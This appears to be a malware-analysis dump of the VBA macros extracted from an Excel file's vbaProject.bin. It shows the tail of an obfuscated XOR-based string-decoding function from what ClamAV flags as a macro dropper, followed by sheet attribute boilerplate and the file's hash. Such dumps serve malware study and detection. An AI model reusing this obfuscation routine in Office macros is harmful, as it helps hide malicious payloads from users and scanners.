    third = (third + k7Sc8zGx2(third) + 1) Mod 256
    fourth(IFctgq1Z1) = fourth(IFctgq1Z1) Xor k7Sc8zGx2(Temp + k7Sc8zGx2((third + k7Sc8zGx2(third)) Mod 254))
Next IFctgq1Z1
bFiJlSB8k = StrConv(fourth, vbUnicode)
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 42496 bytes
SHA-256: 9462d59318ac9d0643177f50e67c9d38725076a611399946904b15a7512a39c2
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely